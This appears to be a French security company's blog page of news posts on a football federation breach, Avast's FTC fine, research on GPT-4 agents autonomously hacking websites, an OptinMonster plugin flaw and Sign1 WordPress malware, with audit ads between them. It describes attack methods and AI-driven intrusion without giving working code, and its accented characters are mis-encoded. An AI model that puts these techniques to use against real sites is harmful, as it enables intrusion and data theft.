La FFF frappée par une cyberattaque
Des donnĂ©es personnelles incluant des coordonnĂ©es et des numĂ©ros de licenciĂ©s de la FĂ©dĂ©ration Française de Football ont Ă©tĂ© piratĂ©es. Plusieurs millions de personnes pourraient ĂȘtre concernĂ©es.
Suite Ă la violation de donnĂ©es et la cyberattaque de la FFF, une enquĂȘte prĂ©liminaire diligentĂ©e sur les instructions de la section J3 du Parquet de Paris a Ă©tĂ© ouverte. (crĂ©dit : FFF)
Les licenciés de la Fédération Française de Football pour les saisons 2022-2023 et 2023-2024 doivent se montrer particuliÚrement vigilant dans les jours, semaines et mois qui viennent. L'organisme a été la cible d'une cyberattaque ayant abouti à une violation de données personnelles potentiellement de trÚs grande ampleur. Des données d'identité (nom, prénom, genre, date et lieu de naissance, nationalité) ainsi que des adresses postales, adresses email, numéros de téléphone et de licencié ont en effet été piratés. En revanche les données bancaires n'auraient pas été exposées.
"Les consĂ©quences potentielles de cette affaire concernent les diffĂ©rentes formes dâhameçonnage (phishing), de tentatives dâescroqueries ou dâusurpation dâidentitĂ©Â dont pourraient ĂȘtre victime les personnes concernĂ©es par cet incident", aprĂ©venu Cybermalveillance.gouv.fr. Selon Le Parisien, un hacker agissant sur un forum du Darknet a prĂ©tendu dĂ©tenir et vouloir vendre des informations issues de plusieurs millions de licences.
MĂȘme les grandes institutions se font avoir, alors avant de vous faire hackers votre site internet faite vous faire un Audit de sĂ©curitĂ© gratuit par defender.action-web.com
La FFF frappée par une cyberattaque, CNIL et Police Judiciaire sur le coup
Suite Ă cette intrusion dont la FFF a eu connaissance via son prestataire en sĂ©curitĂ©, une plainte a Ă©tĂ© dĂ©posĂ©e et une enquĂȘte prĂ©liminaire diligentĂ©e sur les instructions de la section J3 du Parquet de Paris a Ă©tĂ© ouverte Ă la brigade de lutte contre la cybercriminalitĂ© (BL2C) de la direction de la Police Judiciaire de la prĂ©fecture de Police de Paris. Les motifs : infractions dâatteintes Ă des systĂšmes de traitement automatisĂ© de donnĂ©es, collecte frauduleuse de donnĂ©es Ă caractĂšre personnel et recel de bien provenant dâun dĂ©lit. La CNIL a Ă©galement Ă©tĂ© prĂ©venue.
Audit de sécurité de votre site Internet avec des conseils.
50 % à la commande, 50 % à la livraison aprÚs une communication téléphonique et des explications.
En quoi consiste cette prestation dâanalyses et de conseils de sĂ©curitĂ© de site Internet?
En un rapport complet sur les défaillances possibles de sécurité de votre site Internet.
Suivant lâimportance de votre site Internet le rapport dâAudit de SĂ©curitĂ© fera environ une quinzaine de page avec des explications accessibles pour tous.
Comment ?
Par de multiples analyses et vérifications
Des tests dâattaques
Des contrĂŽles de structures
Et suite à nos investigations, nous vous apportons des conseils pour améliorer votre sécurité de site Internet.
en quoi consiste un audit de site web ?
Audit de la Configuration de Sécurité
 Analyse de la structuration des dossiers web
 Analyse de la sécurité du code source
 Analyse contre les Attaques DDoS
 Analyse de la Sécurité des Données
 Analyse des Injections SQL et XSS
 Analyse de la Confidentialité des Données
 Analyse des Certificats SSL/TLS
 Analyse de la Conformité aux Normes de Sécurité
 Analyse des Risques Juridiques
 Analyse de l'éligibilité sur les moteurs de recherche
 Plan dâAction en Cas dâIncident
 Conseils des AccÚs et des Identités
 Conseils personnalisés
Commander et payer 50 % en ligne
Audit réalisé sous 3 à 5 jours ouvrés
Pour d'info ?
Audit de la Configuration de SĂ©curitĂ©Â : une Ă©valuation systĂ©matique des paramĂštres de sĂ©curitĂ© dâun systĂšme informatique, dâun rĂ©seau ou dâune application pour sâassurer quâils sont correctement configurĂ©s et alignĂ©s sur les meilleures pratiques de sĂ©curitĂ©.
Analyse de la structuration des dossiers web : lâanalyse
de la structuration des dossiers web consiste Ă examiner la maniĂšre dont les fichiers et les rĂ©pertoires sont organisĂ©s au sein dâune application web ou dâun site internet. Cette analyse vise Ă Ă©valuer la clartĂ©, la sĂ©curitĂ©, la performance et la maintenabilitĂ© de la structure des dossiers.
 Analyse contre les Attaques DDoS : lâanalyse contre les attaques DDoS (Distributed Denial of Service) vise Ă Ă©valuer la rĂ©silience dâun systĂšme, dâun rĂ©seau ou dâune application face Ă ce type dâattaques, qui cherchent Ă submerger les ressources disponibles pour les rendre inaccessibles aux utilisateurs lĂ©gitimes.
Analyse de la SĂ©curitĂ© des DonnĂ©es : lâanalyse de la sĂ©curitĂ© des donnĂ©es est un processus qui vise Ă Ă©valuer la robustesse des mĂ©canismes mis en place pour protĂ©ger les donnĂ©es contre les menaces potentielles. Cela inclut lâexamen des politiques, des procĂ©dures, des technologies et des pratiques liĂ©es Ă la sĂ©curitĂ© des donnĂ©es.
 Analyse des Injections SQL et XSS : lâ analyse des injections SQL (Structured Query Language) et des attaques XSS (Cross-Site Scripting) sont des aspects cruciaux de la sĂ©curitĂ© des applications web. Ces types dâattaques visent Ă exploiter des vulnĂ©rabilitĂ©s dans les applications pour manipuler des requĂȘtes SQL ou injecter des scripts malveillants dans les pages web.
 Analyse de la ConfidentialitĂ© des DonnĂ©es : lâanalyse de la confidentialitĂ© des donnĂ©es est une Ă©valuation approfondie des politiques, des procĂ©dures et des mĂ©canismes mis en place pour garantir que les donnĂ©es sensibles sont traitĂ©es, stockĂ©es et transmises de maniĂšre sĂ©curisĂ©e. Cette analyse vise Ă identifier les risques potentiels pour la confidentialitĂ© des donnĂ©es et Ă mettre en place des mesures pour les attĂ©nuer.
 Analyse des Certificats SSL/TLS : lâanalyse des certificats SSL/TLS est une Ă©tape essentielle pour Ă©valuer la sĂ©curitĂ© des connexions cryptĂ©es dans un environnement informatique. Les certificats SSL/TLS sont utilisĂ©s pour sĂ©curiser les communications sur Internet, assurant lâintĂ©gritĂ©, la confidentialitĂ© et lâauthenticitĂ© des donnĂ©es Ă©changĂ©es entre un navigateur web et un serveur.
 Analyse de la ConformitĂ© aux Normes de SĂ©curitĂ© : lâanalyse de la conformitĂ© aux normes de sĂ©curitĂ© consiste Ă Ă©valuer dans quelle mesure un systĂšme, un rĂ©seau ou une application respecte les exigences dĂ©finies par des normes de sĂ©curitĂ© spĂ©cifiques. Ces normes peuvent ĂȘtre dictĂ©es par des rĂ©glementations gouvernementales, des organismes de normalisation ou des meilleures pratiques de lâindustrie.
 Analyse des Risques Juridiques : Lâanalyse des risques juridiques consiste Ă Ă©valuer les menaces et les vulnĂ©rabilitĂ©s liĂ©es aux aspects juridiques dâune organisation, notamment en ce qui concerne la conformitĂ© aux lois, rĂšglements et obligations lĂ©gales.
 Analyse de lâĂ©ligibilitĂ© sur les moteurs de recherche : lâanalyse de lâĂ©ligibilitĂ© sur les moteurs de recherche, Ă©galement connue sous le nom dâoptimisation pour les moteurs de recherche (SEO), est une Ă©valuation approfondie visant Ă amĂ©liorer la visibilitĂ© dâun site web sur les rĂ©sultats des moteurs de recherche.
 Plan dâAction en Cas dâIncident : un document dĂ©taillĂ© qui Ă©nonce les procĂ©dures Ă suivre en cas dâincident de sĂ©curitĂ© ou de tout autre Ă©vĂ©nement perturbateur. Lâobjectif principal est de minimiser les impacts, de restaurer rapidement les opĂ©rations normales et de protĂ©ger les actifs de lâorganisation.
 Conseils des AccĂšs et des IdentitĂ©s : la gestion des accĂšs et des identitĂ©s (IAM â Identity and Access Management) est cruciale pour assurer la sĂ©curitĂ© des systĂšmes et les fonctionnalitĂ©s disponible.
0 notes
Lourde amende pour Avast
Avast Ă©cope dâune lourde amende, lâantivirus a vendu vos donnĂ©es de navigation.
16,5 millions de dollars
Avast a collecté et vendu les données de navigation de ses utilisateurs pendant des années. Mal anonymisées, ces informations ont mis en danger la vie privée des internautes. Condamnée par un régulateur américain, la société doit verser une amende de plusieurs millions de dollars.
Avast, lâentreprise de cybersĂ©curitĂ© tchĂšque derriĂšre lâantivirus du mĂȘme nom, vient dâĂȘtre Ă©pinglĂ©Â par la Federal Trade Commission (FTC), lâagence gouvernementale amĂ©ricaine chargĂ©e de la dĂ©fense des consommateurs. DâaprĂšs la FTC, Avast a recueilli des informations concernant les pages web visitĂ©es par ses utilisateurs. La collecte de donnĂ©es sâest Ă©tendue de 2014 Ă 2020, indique lâorganisme.
Lire aussi
Des chercheurs ont dĂ©couvert que le modĂšle dâIA GPT-4 dâOpenAI est capable de pirater des sites web et de voler des informations dans des bases de donnĂ©es en ligne sans aide humaine
Gemini : Google sauvegarde par défaut vos conversations avec son chatbot IA séparément pendant des années
Pour mĂ©moire, Avast a en effet mis un terme Ă Jumpshot, sa filiale consacrĂ©e aux donnĂ©es, il y a quatre ans. La firme a pris cette dĂ©cision Ă la suite dâune enquĂȘte menĂ©e par deux mĂ©dias spĂ©cialisĂ©s, Vice et PC Mag. Lâinvestigation avait rĂ©vĂ©lĂ© que lâextension navigateur dâAvast sâemparait dâune montagne de donnĂ©es sur les usagers. Câest Ă©galement le cas de lâantivirus que ce soit sur smartphone ou PC. Des dizaines de millions de dollars de revenus ont Ă©tĂ© gĂ©nĂ©rĂ©s grĂące Ă Jumpshot avant sa fermeture.
Des données sensibles collectées à votre insu
Comme lâindique le communiquĂ© de lâagence, Avast a « injustement recueilli les informations de navigation des consommateurs par le biais des extensions de navigateur et du logiciel antivirus de la sociĂ©tĂ©, les a stockĂ©es indĂ©finiment et les a vendues sans prĂ©avis et sans le consentement des consommateurs ». Parmi les informations collectĂ©es par ce biais, on trouve les « croyances religieuses des consommateurs, les problĂšmes de santĂ©, les penchants politiques, lâemplacement, la situation financiĂšre et les visites de contenus destinĂ©s aux enfants ».
Ă lâinsu de ses usagers, la sociĂ©tĂ© tchĂšque a vendu les donnĂ©es personnelles, quâon peut considĂ©rer comme sensibles, Ă plus de 100 tiers. Pire, il sâavĂšre quâAvast nâa pas pris les mesures adĂ©quates pour anonymiser les donnĂ©es collectĂ©es et revendues Ă des entreprises du secteur de la publicitĂ©. Les donnĂ©es ont Ă©tĂ© cĂ©dĂ©es avec des identifiants uniques pour chaque navigateur. Chaque identifiant Ă©tait liĂ© Ă des informations personnelles, comme les sites web visitĂ©s, « les horodatages prĂ©cis, le type dâappareil et de navigateur, le nom de la ville, lâĂtat et le pays ».
En combinant ces informations, il est thĂ©oriquement possible de remonter jusquâĂ lâidentitĂ© dâun internaute. Selon la FTC, Jumpshot permettait mĂȘme Ă ses partenaires de « suivre des utilisateurs spĂ©cifiques ou mĂȘme dâassocier des utilisateurs spĂ©cifiques â et leur historique de navigation â Ă dâautres informations ». En 2020, Avast avait pourtant assurĂ© que les donnĂ©es Ă©taient scrupuleusement anonymisĂ©es par ses soins, suscitant les inquiĂ©tudes des experts en sĂ©curitĂ©.
Chez Defender action web, on ne parle jamais de nos clients, s'est eux qui parle de nous !
Lourde amende pour Avast de 16,5 millions de dollars
La FTC a donc dĂ©cidĂ© dâinterdire Ă Avast de « vendre ou de concĂ©der sous licence toute donnĂ©e de navigation » rĂ©cupĂ©rĂ©e par ses produits. La sociĂ©tĂ© doit absolument effacer toutes les donnĂ©es personnelles collectĂ©es par Jumpshot. Dans la foulĂ©e, la firme spĂ©cialisĂ©e dans les antivirus Ă©cope dâune amende de 16,5 millions de dollars. La somme sera utilisĂ©e pour « fournir rĂ©paration aux consommateurs ». La FTC enjoint Avast Ă obtenir le « consentement express » des usagers avant de vendre leurs donnĂ©es de navigation.
Dans un communiqué adressé à  The Verge, Avast se dit opposé aux « allégations et à la caractérisation des faits » mise en avant par la FTC.
Néanmoins, la firme basée en République tchÚque se dit heureuse de « résoudre ce problÚme » afin de pouvoir « continuer à servir nos millions de clients dans le monde entier ».
0 notes
ChatGPT-4 peut pirater des sites web
Des chercheurs ont dĂ©couvert que le modĂšle ChatGPT-4 dâOpenAI est capable de pirater des sites web et de voler des informations dans des bases de donnĂ©es en ligne sans aide humaine
Des chercheurs ont dĂ©montrĂ© que les grands modĂšles de langage sont capables de pirater des sites web de maniĂšre autonome, en effectuant des tĂąches complexes sans connaissance prĂ©alable de la vulnĂ©rabilitĂ©. Le modĂšle GPT-4 dâOpenAI pouvait pirater 73 % des sites web lors de lâĂ©tude. Cette Ă©tude rappelle la nĂ©cessitĂ© pour les fournisseurs de LLM de rĂ©flĂ©chir soigneusement au dĂ©ploiement et Ă la publication des modĂšles.
Les modĂšles dâIA, qui font lâobjet de prĂ©occupations constantes en matiĂšre de sĂ©curitĂ© concernant les rĂ©sultats nuisibles et biaisĂ©s, prĂ©sentent un risque qui va au-delĂ de lâĂ©mission de contenu. Lorsquâils sont associĂ©s Ă des outils permettant une interaction automatisĂ©e avec dâautres systĂšmes, ils peuvent agir seuls comme des agents malveillants.
Lire aussi
France Travail victime dâune cyberattaque. 43 millions de personnes sont potentiellement concernĂ©es.
Des informaticiens affiliĂ©s Ă lâuniversitĂ© de lâIllinois Urbana-Champaign (UIUC) lâont dĂ©montrĂ© en utilisant plusieurs grands modĂšles de langage (LLM) pour compromettre des sites web vulnĂ©rables sans intervention humaine. Des recherches antĂ©rieures suggĂšrent que les LLM peuvent ĂȘtre utilisĂ©s, malgrĂ© les contrĂŽles de sĂ©curitĂ©, pour aider Ă la crĂ©ation de logiciels malveillants.
Les chercheurs Richard Fang, Rohan Bindu, Akul Gupta, Qiusi Zhan et Daniel Kang sont allĂ©s plus loin et ont montrĂ© que les agents alimentĂ©s par des LLM â des LLM dotĂ©s dâoutils dâaccĂšs aux API, de navigation web automatisĂ©e et de planification basĂ©e sur le retour dâinformation â peuvent se promener seuls sur le web et sâintroduire dans des applications web boguĂ©es sans surveillance. Ils dĂ©crivent leurs rĂ©sultats dans un article intitulĂ© âLLM Agents can Autonomously Hack Websitesâ (Les agents LLM peuvent pirater des sites web de maniĂšre autonome).
Les chercheurs résument leurs travaux en expliquant :
Des agents LLM autonomes capables de pirater des sites web
Les grands modĂšles de langage (LLM) sont devenus de plus en plus performants, avec des avancĂ©es rĂ©centes permettant aux LLM dâinteragir avec des outils via des appels de fonction, de lire des documents et de sâauto-inviter rĂ©cursivement. Collectivement, ces Ă©lĂ©ments permettent aux LLM de fonctionner de maniĂšre autonome en tant quâagents. Par exemple, les agents LLM peuvent contribuer Ă la dĂ©couverte scientifique.
Ces agents LLM devenant plus performants, des travaux rĂ©cents ont spĂ©culĂ© sur le potentiel des LLM et des agents LLM Ă contribuer Ă lâoffensive et Ă la dĂ©fense en matiĂšre de cybersĂ©curitĂ©. MalgrĂ© ces spĂ©culations, on sait peu de choses sur les capacitĂ©s des agents LLM en matiĂšre de cybersĂ©curitĂ©. Par exemple, des travaux rĂ©cents ont montrĂ© que les LLM peuvent ĂȘtre incitĂ©s Ă gĂ©nĂ©rer des logiciels malveillants simples, mais nâont pas explorĂ© les agents autonomes.
Lâimage suivant prĂ©sente le schĂ©ma de lâutilisation dâagents LLM autonomes pour pirater des sites web :
Les agents LLM peuvent pirater des sites web de maniĂšre autonome, en effectuant des tĂąches complexes sans connaissance prĂ©alable de la vulnĂ©rabilitĂ©. Par exemple, ces agents peuvent effectuer des attaques complexes de type SQL union, qui impliquent un processus en plusieurs Ă©tapes (38 actions) dâextraction dâun schĂ©ma de base de donnĂ©es, dâextraction dâinformations de la base de donnĂ©es basĂ©e sur ce schĂ©ma, et dâexĂ©cution du piratage final. Lâagent le plus performant peut pirater 73,3 % (11 sur 15, rĂ©ussite Ă 5) des vulnĂ©rabilitĂ©s testĂ©es, ce qui montre les capacitĂ©s de ces agents. Il est important de noter que lâagent LLM est capable de trouver des vulnĂ©rabilitĂ©s dans des sites Web du monde rĂ©el.
Pour donner à ces agents LLM la capacité de pirater des sites web de maniÚre autonome, ils leur ont donné la possibilité de lire
des documents, dâappeler des fonctions pour manipuler un navigateur web et rĂ©cupĂ©rer des rĂ©sultats, et dâaccĂ©der au contexte des actions prĂ©cĂ©dentes. Ils ont fourni en outre Ă lâagent LLM des instructions dĂ©taillĂ©es sur le systĂšme. Ces capacitĂ©s sont dĂ©sormais largement disponibles dans les API standard, telles que la nouvelle API OpenAI Assistants. Par consĂ©quent, ces capacitĂ©s peuvent ĂȘtre mises en Ćuvre en seulement 85 lignes de code avec des outils standard.
Les rĂ©sultats ont montrĂ© que ces capacitĂ©s permettent au modĂšle le plus performant au moment de la rĂ©daction (GPT-4) de pirater des sites web de maniĂšre autonome. De maniĂšre incroyable, GPT-4 peut effectuer ces piratages sans connaissance prĂ©alable de la vulnĂ©rabilitĂ© spĂ©cifique. Tous les composants sont nĂ©cessaires pour obtenir des performances Ă©levĂ©es, le taux de rĂ©ussite chutant Ă 13 % lorsque lâon supprime des composants.
Taux de réussite du GPT-4 par vulnérabilité, ai hacker
ChatGPT-4 peut pirater des sites web
Les rĂ©sultats ont montrĂ© Ă©galement que le piratage des sites web a une forte loi dâĂ©chelle, le taux de rĂ©ussite de GPT-3.5 tombant mĂȘme Ă 6,7 % (1 vulnĂ©rabilitĂ© sur 15). Cette loi dâĂ©chelle se poursuit pour les modĂšles open-source, chaque modĂšle open-source testĂ© atteignant un taux de rĂ©ussite de 0 %.
LâĂ©tude a Ă©galement analysĂ© le coĂ»t du piratage autonome de sites web. Si lâon tient compte des Ă©checs dans le coĂ»t total, la tentative de piratage dâun site web coĂ»te environ 9,81 dollars. Bien que coĂ»teux, ce coĂ»t est probablement beaucoup moins Ă©levĂ© que lâeffort humain (qui peut coĂ»ter jusquâĂ 80 dollars).
Pour protéger un site Internet il vous faut des pros, il faut savoir ce que vous pouvez perdre, faite vous faire un audit de sécurité
intelligence artificial hacking
Conclusion
Cette recherche montre que les agents LLM peuvent pirater des sites web de maniĂšre autonome, sans connaĂźtre la vulnĂ©rabilitĂ© Ă lâavance. Lâagent le plus performant peut mĂȘme trouver de maniĂšre autonome des vulnĂ©rabilitĂ©s dans des sites Web du monde rĂ©el. Les rĂ©sultats montrent en outre des lois dâĂ©chelle fortes avec la capacitĂ© des LLM Ă pirater des sites web : GPT-4 peut pirater 73 % des sites web construits pour lâĂ©tude, contre 7 % pour GPT-3.5 et 0 % pour tous les modĂšles open-source. Le coĂ»t de ces piratages par des agents LLM est probablement beaucoup moins Ă©levĂ© que le coĂ»t dâun analyste en cybersĂ©curitĂ©.
CombinĂ©s, ses rĂ©sultats montrent la nĂ©cessitĂ© pour les fournisseurs de LLM de rĂ©flĂ©chir soigneusement au dĂ©ploiement et Ă la publication des modĂšles. On peut souligner deux rĂ©sultats importants. Tout dâabord, lâĂ©tude constate que tous les modĂšles open-source existants sont incapables de pirater de maniĂšre autonome, mais que les modĂšles frontiĂšres (GPT-4, GPT-3.5) le sont. DeuxiĂšmement, les chercheurs pensent que ces rĂ©sultats sont les premiers exemples de dommages concrets causĂ©s par les modĂšles frontiĂšres. Compte tenu de ces rĂ©sultats, ils espĂšrent que les fournisseurs de modĂšles open source et fermĂ© examineront attentivement les politiques de diffusion des modĂšles frontiĂšres.
ai hacking tools
0 notes
Un million de sites contrÎlés à distance
La vulnĂ©rabilitĂ© dâun plugin WordPress a ouvert un million de sites Ă une prise de contrĂŽle Ă distance.
Cette faille permet Ă toute personne non identifiĂ©e dâaccĂ©der aux informations sensibles
Les chercheurs en sĂ©curitĂ© de Wordfence, une sociĂ©tĂ© spĂ©cialisĂ©e dans lâingĂ©nierie logicielle et la sĂ©curitĂ©, ont rĂ©vĂ©lĂ© que des vulnĂ©rabilitĂ©s dans OptinMonster, un plugin de marketing par courriel pour WordPress, ont exposĂ© un million de sites Ă une prise de contrĂŽle Ă distance. Les vulnĂ©rabilitĂ©s permettent Ă un cybercrinel dâaccĂ©der Ă des informations sensibles et dâajouter du code JavaScript malveillant aux sites WordPress.
Des chercheurs ont dĂ©couvert que le modĂšle dâIA GPT-4 dâOpenAI est capable de pirater des sites web et de voler des informations dans des bases de donnĂ©es en ligne sans aide humaine
Les pirates peuvent lire les conversations privĂ©es avec les assistants dâIA mĂȘme lorsquâelles sont chiffrĂ©es
OptinMonster est un plugin conçu pour aider les propriĂ©taires de sites WordPress Ă gĂ©nĂ©rer des campagnes de marketing par courriel. LâĂ©quipe Wordfence Threat Intelligence aurait informĂ© les dĂ©veloppeurs de ce plugin de la faille le 28 septembre et une version entiĂšrement corrigĂ©e dâOptinMonster, la version 2.6.5, a Ă©tĂ© publiĂ©e le 7 octobre. Wordfence a publiĂ© le 27 octobre un avis de sĂ©curitĂ© dĂ©taillant ses conclusions.
« Le 28 septembre 2021, lâĂ©quipe Wordfence Threat Intelligence a lancĂ© le processus de divulgation responsable pour plusieurs vulnĂ©rabilitĂ©s que nous avons dĂ©couvertes dans OptinMonster, un plugin WordPress installĂ© sur plus de 1 000 000 de sites. Ces failles permettaient Ă un cybercriminel non authentifiĂ©, câest-Ă -dire nâimporte quel visiteur du site, dâexporter des informations sensibles et dâajouter des JavaScript malveillants aux sites WordPress. Les utilisateurs de Wordfence Premium ont reçu le 28 septembre 2021 une rĂšgle de pare-feu pour se protĂ©ger contre tout exploit ciblant ces vulnĂ©rabilitĂ©s. Les sites utilisant encore la version gratuite de Wordfence recevront la mĂȘme protection le 28 octobre 2021 », a dĂ©clarĂ© Wordfence.
OptinMonster est un plugin incroyablement intuitif et facile Ă utiliser, conçu pour crĂ©er des campagnes de vente sur des sites WordPress grĂące Ă lâutilisation de boĂźtes de dialogue. La grande majoritĂ© des fonctionnalitĂ©s du plugin ainsi que le site de lâapplication OptinMonster reposent sur lâutilisation de points de terminaison API pour permettre une intĂ©gration transparente et un processus de conception simplifiĂ©. Malheureusement, la majoritĂ© des points de terminaison REST-API nâont pas Ă©tĂ© implĂ©mentĂ©s de maniĂšre sĂ©curisĂ©e, ce qui permet Ă des attaquants non authentifiĂ©s dâaccĂ©der Ă de nombreux points de terminaison sur des sites utilisant une version vulnĂ©rable du plugin.
Le plus critique des points de terminaison REST-API Ă©tait le point de terminaison /wp-json/omapp/v1/support, qui divulguait des donnĂ©es sensibles telles que le chemin complet du site sur le serveur, ainsi que la clĂ© API nĂ©cessaire pour effectuer des requĂȘtes sur le site OptinMonster. En accĂ©dant Ă la clĂ© API, un cybercriminel pouvait modifier toute campagne associĂ©e au compte OptinMonster connectĂ© Ă un site et ajouter un JavaScript malveillant qui sâexĂ©cuterait chaque fois quâune campagne serait affichĂ©e sur le site exploitĂ©.
Cela signifie aussi que nâimporte quel attaquant non authentifiĂ© peut ajouter un JavaScript malveillant Ă un site exĂ©cutant OptinMonster, ce qui peut conduire Ă la redirection des visiteurs du site vers des domaines malveillants externes et Ă la prise de contrĂŽle totale des sites dans le cas oĂč un JavaScript est ajoutĂ© pour injecter de nouveaux comptes dâutilisateurs administratifs ou Ă©craser le code du plugin avec un webshell pour obtenir un accĂšs backdoor Ă un site.
Heureusement, lâĂ©quipe dâOptinMonster a invalidĂ© toutes les clĂ©s API pour obliger les propriĂ©taires de sites Ă gĂ©nĂ©rer de nouvelles clĂ©s dans le cas oĂč une clĂ© aurait
Ă©tĂ© prĂ©cĂ©demment compromise, et a mis en place des restrictions qui empĂȘchent les clĂ©s API associĂ©es aux sites WordPress dâeffectuer des changements de campagne en utilisant lâapplication OptinMonster, ce qui empĂȘche lâexploitation de cette chaĂźne de vulnĂ©rabilitĂ©.
Un million de sites contrÎlés à distance
Nous avons des solutions pour solutionner vos problĂšmes de piratage.
Le CMS WordPress alimente environ 41 % du Web y compris le site de la Maison Blanche
WordPress est un systĂšme de gestion de contenu (SGC ou content management system (CMS) en anglais) gratuit, libre et open source. Ce logiciel Ă©crit en PHP repose sur une base de donnĂ©es MySQL et est distribuĂ© par la fondation WordPress.org. Les fonctionnalitĂ©s de WordPress lui permettent de crĂ©er et gĂ©rer diffĂ©rents types de sites Web : site vitrine, site de vente en ligne, site applicatif, blog, portfolio, site institutionnel, site dâenseignement, etc.
Le baromĂštre W3Techs a indiquĂ© en fin dâannĂ©e derniĂšre que lâutilisation du CMS WordPress continue de croĂźtre : le CMS Ă©tait Ă cette date utilisĂ© sur 39,5 % des sites web et serait aujourdâhui utilisĂ© par un peu plus de 41 % des sites du Web. Les nouveaux locataires de la Maison blanche ont choisi de rester sur le CMS WordPress pour lancer le site de la Maison Blanche. Lâadministration prĂ©cĂ©dente est passĂ©e de Drupal Ă WordPress en 2017, et les dĂ©veloppeurs web travaillant avec lâadministration Biden ont dĂ©cidĂ© de sâen tenir au mĂȘme CMS.
En 2016, WordPress a Ă©tĂ© le CMS le plus ciblĂ© par les cyberattaques, selon une Ă©tude menĂ©e par la sociĂ©tĂ© de sĂ©curitĂ© Sucuri. En 2018, le CMS a vu le nombre de vulnĂ©rabilitĂ©s qui lui sont liĂ©s tripler. Pour WordPress, le risque est encore plus Ă©levĂ© puisque le CMS propulse prĂšs de 41 % des sites du Web, un pourcentage de taille qui fait quâil existe un large nombre de victimes potentielles, un facteur important qui attire les hackers. Il est recommandĂ© aux utilisateurs du plugin OptinMonster de vĂ©rifier que le site a Ă©tĂ© mis Ă jour avec la derniĂšre version corrigĂ©e dâOptinMonster, qui est la 2.6.5.
0 notes
Piratage de 39 000 sites Web WordPress
Le logiciel malveillant Sign1 a piraté 39 000 sites Web WordPress
Le site Web d'un client rencontrait des pop-ups aléatoires alors que les journaux de l'analyseur cÎté serveur révélaient une injection JavaScript liée à Sign1, une campagne de malware qui cible les sites Web et a infecté plus de 2 500 sites Web au cours des deux derniers mois et utilise des techniques difficiles pour échapper à la détection.
Les analyses quotidiennes cÎté serveur sont cruciales pour détecter les changements tels que les nouveaux logiciels malveillants, examiner les journaux des sites Web et identifier les modifications dans les plugins, en particulier ceux permettant l'injection de code personnalisé.
Les plugins sont attrayants pour les attaquants car ils permettent d'intĂ©grer du code malveillant et une enquĂȘte a rĂ©vĂ©lĂ© un code malveillant intĂ©grĂ© dans un plugin CSS et JS personnalisĂ© apparemment inoffensif.
Bien que les attaquants abusent couramment de ces plugins, ce code spécifique affiche une méthode unique et intrigante.
culprit nestled inside Custom CSS & JS
Piratage de 39 000 sites Web WordPress Histoire du logiciel malveillant Sign1
Les chercheurs en sécurité de Sucuri ont découvert une campagne de malware ciblant les sites Web WordPress appelée Sign1, qui injecte des scripts malveillants dans les sites Web à l'aide de widgets ou de plugins HTML personnalisés.
Le malware utilise des paramÚtres codés en base64 et une randomisation temporelle pour générer des URL dynamiques qui changent toutes les 10 minutes et récupérer des scripts malveillants supplémentaires qui peuvent rediriger les visiteurs vers des sites frauduleux ou diffuser des publicités indésirables.
Au deuxiĂšme semestre 2023, il a Ă©galement Ă©tĂ© dĂ©couvert qu'il s'agissait d'une campagne, et les chercheurs ont remarquĂ© que le logiciel malveillant modifiait ses mĂ©thodes de dissimulation pour Ă©viter d'ĂȘtre dĂ©tectĂ©.
Analyse du logiciel malveillant
Le code utilise la randomisation basĂ©e sur le temps Ă des fins de vĂ©rification et rĂ©cupĂšre l'heure Unix actuelle (millisecondes depuis le 01/01/1970) Ă l'aide de Date.now(), qui est ensuite convertie en secondes et alignĂ©e sur un intervalle de 10 minutes, garantissant que les horodatages sont cohĂ©rent dans cette fenĂȘtre.
La valeur est exprimée sous forme de chaßne hexadécimale et une chaßne apparemment aléatoire agit comme un jeton de vérification, alors que les demandes de fichiers JavaScript provenant d'un domaine tiers incluent ce jeton.
utilisation de la date. fonctionne maintenant en haut du script
Le serveur compare la composante temporelle du jeton avec l'heure actuelle, rejetant probablement les demandes avec des horodatages obsolĂštes ou invalides, potentiellement pour empĂȘcher un accĂšs non autorisĂ© ou une rĂ©cupĂ©ration de donnĂ©es obsolĂštes.
Les attaquants ont injecté un ensemble de chiffres codés en dur obscurcis par le codage XOR, tandis que la clé (40682) était facilement disponible dans l'échantillon, permettant aux chercheurs d'inverser le codage et de découvrir un domaine nouvellement enregistré.
De nouvelles valeurs
Cette technique est courante pour les attaquants pour masquer le contenu malveillant tout en restant détectable en connaissant la clé.
Le code Javascript malveillant modifie dynamiquement les URL dans les navigateurs des visiteurs toutes les 10 minutes, ciblant les visiteurs qui n'ont pas visitĂ© le site via un rĂ©fĂ©rent majeur (par exemple, Google) et qui n'ont pas vu la fenĂȘtre contextuelle auparavant (vĂ©rifiĂ©e par un cookie).
La redirection se produit
Si les conditions sont remplies, le code injecte un autre script pour rediriger les utilisateurs vers des sites frauduleux (souvent des domaines VexTrio) en envoyant l'URL de la page actuelle, le référent et la langue du navigateur (codé en base64) à un systÚme de distribution de trafic (TDS).
Téléchargements par jour
Les attaquants utilisent les populaires plugins Simple Custom CSS et JS pour y
parvenir, tandis que le malware récupÚre des scripts supplémentaires à partir de domaines enregistrés peu de temps avant l'attaque, ce qui les rend difficiles à bloquer.
Les attaquants ont changé de fournisseur d'hébergement et ont utilisé Cloudflare pour rendre encore plus difficile la compréhension de leur emplacement en contournant les analyses de sécurité classiques, car le code malveillant réside dans la base de données plutÎt que dans les fichiers du serveur.
0 notes
Les pirates informatiques abusent des sites Web de publication de documents (DDP) pour lancer des cyberattaques.
Des acteurs malveillants ont été observés hébergeant des documents de phishing sur des sites légitimes de publication de documents numériques (DDP) dans le cadre de tentatives continues de collecte de sessions et d'identification.
Ătant donnĂ© quâil est peu probable que les sites DDP soient bloquĂ©s par des filtres Web, quâils jouissent dâune bonne rĂ©putation et quâils puissent donner aux visiteurs lâimpression quâils sont dignes de confiance, lâhĂ©bergement de leurres de phishing sur ces sites augmente les chances de rĂ©ussite dâune attaque de phishing.
Les « sites de publication de documents numériques » sont des plates-formes en ligne qui permettent aux utilisateurs de télécharger et de partager des fichiers PDF au format flipbook basé sur un navigateur.
Les utilisateurs peuvent lire un PDF dans son intégralité en tournant les pages sans télécharger le fichier, et certains sites Web DDP disposent de fonctionnalités permettant une interaction supplémentaire avec le document.
Publuu, Marq, FlipSnack, Issuu, FlippingBook, RelayTo et SimpleBooklet sont quelques sites DDP impliqués dans la campagne.
Les attaquants exploitent les sites DDP pour le vol continu d'informations d'identification et de jetons de session
